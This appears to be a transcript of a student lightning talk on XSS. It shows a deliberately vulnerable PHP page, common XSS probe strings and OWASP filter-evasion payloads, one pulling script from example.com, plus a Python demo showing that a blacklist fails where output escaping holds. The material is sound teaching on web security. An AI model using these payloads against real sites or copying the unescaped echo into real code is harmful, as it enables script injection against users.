Investigating XSS input values / searching xss insertion value
Tomoyuki KOYAMA
February 03, 2018
Technology
2018/02/03 Student LT (lightning talk) at freee
Transcript
XSS
Self-introduction: B1 (first-year undergraduate). Twitter: @tmyk_kym. Blog: https://blog.koyama.me/. Interests: Network / Web / Server / Security. PyCon JP, Seccamp, etc.
XSS (Cross Site Scripting): injection of attacker-controlled input into HTML output. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE 3.0).
Sample page (deliberately vulnerable, as on the slide):

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1><?php echo $_GET['mode']; ?></h1>

With $_GET['mode'] = hello the generated page is:

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1>hello</h1>

With $_GET['mode'] = <script>alert()</script> the generated page is:

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1><script>alert()</script></h1>
Types of XSS: Stored XSS, Reflected XSS, DOM Based XSS
XSS == XSS
Typical input values used to check for XSS:
  <script>alert(1)</script>
  "><script>alert(1)</script>
  " onmouseover="alert(1)
  x" onerror="alert(1)        <- in an img src attribute
  javascript:alert(1)         <- in an a href attribute
XSS
? / . XSS . XSS .
?
Source: OWASP XSS Filter Evasion Cheat Sheet (2015 Japanese translation by JPCERT/CC): https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
Three entries picked out from the cheat sheet:

[1] <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
    A "/" is accepted in place of whitespace after the tag name, so the HTML parser reads this as
    <script xss="" src="http://example.com/xss.js"></script>

[2] <<SCRIPT>alert("XSS");//<</SCRIPT>
    Extra "<" characters are tolerated by the HTML parser; the result is equivalent to
    "><script> alert("XSS");//< </script>

[3] <img src=x onerror=javas cript:ale rt('XSS')>
    The gaps are HTML numeric character references in hexadecimal (&#x...;), which the browser decodes in the attribute value, giving
    <img src="x" onerror="javascript:alert('XSS')">
Further entries from the cheat sheet:
  <img src=javascript:alert('XSS')>
  <img src=javascript: alert(String.fromCharCode(88,83,83))>
  <META HTTP-EQUIV="refresh" CONTENT="3;URL=http://;URL=http://yahoo.co.jp/;">
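Added example (not from the slides): the three cheat-sheet payloads above, run through a raw-text blacklist of the kind the entries are designed to evade, then through an HTML tokenizer to show what a browser-like parser actually makes of them, next to the output encoding that fixes the `<h1><?php echo $_GET['mode']; ?></h1>` sample. It assumes Python's html.parser approximates browser tokenization for these inputs, and fills the elided references in [3] with `&#x09;` (tab).

```python
import html
import re
from html.parser import HTMLParser

# Constructed inputs modelled on the slide's three cheat-sheet entries. In [3] the
# character references the slide elides are assumed to be &#x09; (tab).
PAYLOADS = {
    "slash-attribute": '<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>',
    "extra-brackets": '<<SCRIPT>alert("XSS");//<</SCRIPT>',
    "hex-charref": "<img src=x onerror=javas&#x09;cript:ale&#x09;rt('XSS')>",
}

TAG_RE = re.compile(r"<([^>]*)>")  # "a tag is whatever sits between < and >"

def naive_tag_filter(value):
    """Blacklist that inspects the raw input text. Returns True when it lets input through."""
    for inner in TAG_RE.findall(value):
        words = inner.split()
        name = words[0].lower() if words else ""
        if name == "script" or "javascript:" in inner.lower() or "alert(" in inner.lower():
            return False
    return True

class TagCollector(HTMLParser):
    """Records each start tag with its decoded attributes, as a browser would see them."""
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def parse_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def render_unsafe(mode):
    """Mirrors the slide's <h1><?php echo $_GET['mode']; ?></h1>: raw interpolation."""
    return "<h1>%s</h1>" % mode

def render_safe(mode):
    """The fix: encode for the HTML text context (what htmlspecialchars does in PHP)."""
    return "<h1>%s</h1>" % html.escape(mode, quote=True)

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, "passes naive filter:", naive_tag_filter(payload))
        print("  parser sees:   ", parse_tags(render_unsafe(payload))[1:])
        print("  after escaping:", parse_tags(render_safe(payload))[1:])
```

The plain `<script>alert()</script>` from the sample page is blocked by the same filter, which is exactly why a blacklist on raw text gives false confidence while output encoding holds for all three.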
Electron / Marp: Marp is built on Electron, and an Electron app is a Web app ... putting <script>alert()</script> into a slide ... alert() fires ...
?
JVN#21174546: Marp, JavaScript execution: https://jvn.jp/jp/JVN21174546/
From "[Security issue] Remote script can read user local resource" · Issue #187 · yhatt/marp: "However, sanitizing inline script should consider on future."
XSS XSS alert() Electron